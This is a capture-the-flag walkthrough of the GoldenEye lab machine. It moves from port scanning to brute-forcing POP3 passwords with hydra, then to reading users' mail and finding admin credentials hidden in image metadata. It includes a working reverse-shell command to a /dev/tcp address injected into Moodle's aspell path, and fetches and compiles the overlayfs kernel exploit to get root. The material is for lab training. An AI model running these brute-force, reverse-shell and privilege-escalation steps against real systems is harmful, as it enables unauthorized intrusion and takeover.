GoldenEye
1. Initial Port Scan and Service Discovery
export TARGET_IP=10.10.206.199
sudo nmap -p- $TARGET_IP
Output:
Not shown: 65532 closed ports
PORT STATE SERVICE
25/tcp open smtp
80/tcp open http
55006/tcp open unknown
55007/tcp open unknown
nmap -sV -p 55006,55007 $TARGET_IP
Output:
PORT STATE SERVICE VERSION
55006/tcp open ssl/pop3 Dovecot pop3d
55007/tcp open pop3 Dovecot pop3d
POP3 (Post Office Protocol version 3) is used for retrieving emails from a mail server.
2. Web Application Reconnaissance and Credential Discovery
With port 80 (HTTP) open, we investigate the web application. Browsing to http://10.10.206.199 reveals a web page. Upon inspecting the source code of the homepage, we find a JavaScript file terminal.js linked at http://10.10.206.199/terminal.js. Viewing this file reveals interesting comments:
- It mentions a user "Boris" and a potential password.
- The password is HTML encoded:
InvincibleHack3r. - Another user "Natalya" is mentioned, suggesting potential usernames within the system.
We decode the HTML encoded password using Python:
python -c "import html; print(html.unescape('InvincibleHack3r'))"
The decoded password for user "Boris" is InvincibleHack3r.
3. POP3 Service Exploitation
Given the open POP3 ports and the discovered username "boris," we attempt to connect to the POP3 server on port 55007 and log in using the discovered credentials. We use netcat (nc) for manual interaction with the POP3 service.
nc $TARGET_IP 55007
After connecting with netcat, we manually interact with the POP3 server:
+OK GoldenEye POP3 Electronic-Mail System
USER boris
+OK
PASS InvincibleHack3r
-ERR [AUTH] Authentication failed.
Analysis:
Although we have a password potentially for "boris", the POP3 server rejects the InvincibleHack3r password. This suggests that the password might be outdated or incorrect for the POP3 service.
Since the initial password failed, we proceed with password brute-forcing for the user "boris" using hydra.
hydra -l boris -P /usr/share/wordlists/fasttrack.txt $TARGET_IP -s 55007 pop3
[55007][pop3] host: 10.10.206.199 login: boris password: secret1!
4. Accessing Boris' Emails via POP3
With the valid credentials boris:secret1!, we connect to the POP3 server again using netcat and retrieve Boris' emails.
nc $TARGET_IP 55007
> +OK GoldenEye POP3 Electronic-Mail System
USER boris
> +OK
PASS secret1!
> +OK Logged in.
LIST
> +OK 3 messages:
> 1 544
> 2 373
> 3 921
RETR 1
RETR 2
RETR 3
Email Content (Retrieved using RETR commands):
Message 3:
From: alec@janus.boss
Boris,
Once Xenia gets access to the training site and becomes familiar with the GoldenEye Terminal codes we will push to our final stages....
- Usernames:
root,natalya,alec, andxeniaare mentioned as users within the system.
5. Brute-forcing Natalya's POP3 Password
Based on the emails and the comment in terminal.js, "Natalya" is another likely user. We attempt to brute-force her POP3 password using hydra.
hydra -l natalya -P /usr/share/wordlists/fasttrack.txt -t 64 pop3://$TARGET_IP:55007
[55007][pop3] host: 10.10.206.199 login: natalya password: bird
6. Accessing Natalya's Emails via POP3
Using the credentials natalya:bird, we access Natalya's emails via POP3.
nc $TARGET_IP 55007
> +OK GoldenEye POP3 Electronic-Mail System
USER natalya
> +OK
PASS bird
> +OK Logged in.
LIST
> +OK 2 messages:
> 1 631
> 2 1048
RETR 1
RETR 2
Analysis:
Natalya's emails provide more valuable information:
- "GNO supervisor for training": Confirms the existence of a training site.
- "severnaya-station.com/gnocertdir": Reveals the URL for the training site.
- "xenia:RCP90rulez!": Provides credentials for a new user, "xenia", for the training site.
/etc/hostsmodification: Instructions to modify the local/etc/hostsfile to resolvesevernaya-station.comto the target IP. This is necessary becausesevernaya-station.comis likely an internal domain not publicly resolvable.
7. Host File Modification and Accessing the Training Site
Following the instructions in Natalya's email, we modify the /etc/hosts file to map severnaya-station.com to the target IP address.
echo "$TARGET_IP severnaya-station.com" | sudo tee -a /etc/hosts
After modifying the /etc/hosts file, we can access the training site at http://severnaya-station.com/gnocertdir/.
We log in to http://severnaya-station.com/gnocertdir/ using the credentials xenia:RCP90rulez!.
8. Exploring the Training Site and Discovering Doak's Credentials
Within the training site, specifically in http://severnaya-station.com/gnocertdir/message/index.php?viewing=unread&user2=5, we find messages that reveal another username: doak.
We then attempt to brute-force Doak's POP3 password.
hydra -l doak -P /usr/share/wordlists/fasttrack.txt -t 64 pop3://$TARGET_IP:55007
[55007][pop3] host: 10.10.206.199 login: doak password: goat
9. Accessing Doak's Emails via POP3 and Discovering Dr_Doak's Credentials
We access Doak's emails using the credentials doak:goat.
nc $TARGET_IP 55007
> +OK GoldenEye POP3 Electronic-Mail System
USER doak
> +OK
PASS goat
> +OK Logged in.
LIST
> +OK 1 messages:
1 606
RETR 1
Analysis:
Doak's email provides credentials for another user, dr_doak, for the training site: dr_doak:4England!.
10. Logging into Dr_Doak's Training Site Account and Finding Sensitive File
We log in to the training site at http://severnaya-station.com/gnocertdir/login/index.php using the credentials dr_doak:4England!. Within Dr_Doak's account, we navigate to the "private file" section (presumably http://severnaya-station.com/gnocertdir/user/files.php) and download the file s3cret.txt.
cat s3cret.txt
Analysis:
- `/dir007key/for-007.jpg": A potentially interesting file location on the web server.
11. Analyzing for-007.jpg Metadata for Admin Credentials
We access http://severnaya-station.com/dir007key/for-007.jpg and download the image file. We then use exiftool to analyze its metadata for hidden information.
exiftool for-007.jpg
Image Description : eFdpbnRlcjE5OTV4IQ==
The Image Description metadata field contains a Base64 encoded string: eFdpbnRlcjE5OTV4IQ==. We decode this string using base64.
echo "eFdpbnRlcjE5OTV4IQ==" | base64 -d
Output:
xWinter1995x!
Analysis:
The decoded string is xWinter1995x!. This is likely the administrator password mentioned in s3cret.txt.
12. Admin Login and Final Step (Aspell Search)
We now have potential administrator credentials: admin:xWinter1995x!. Log in as "admin" and then search for "spell" in a search bar within the application.
You will see the "Spell engine" and "Path to aspell", change its command for a reverse shell (replace IP address by your VPN one):
Change:
- Spell engine > PSpellShell
- Path to aspell >
bash -c 'exec bash -i &>/dev/tcp/10.2.17.44/6666 <&1'- (replace IP address by your VPN adress)
nc -lvnp 6666
Execute it by going to Site pages > Site blogs > Add a new entry and press the last button Toggle spellchecker from the Blog entry body menu.
id # uid=33(www-data) gid=33(www-data) groups=33(www-data)
uname -a
This machine is vulnerable to the overlayfs exploit: https://www.exploit-db.com/exploits/37292. Download it.
Because gcc is not available is the target machine we can use cc to compile the code. Change the part in the code, gcc by cc.
python3 -m http.server 8000 # Host
cd /tmp # Target Machine
wget http://10.2.17.44:8000/37292.c # Download
cc 37292.c -o exploit
./exploit
id # uid=0(root) gid=0(root) groups=0(root),33(www-data)
cat /root/.flag.txt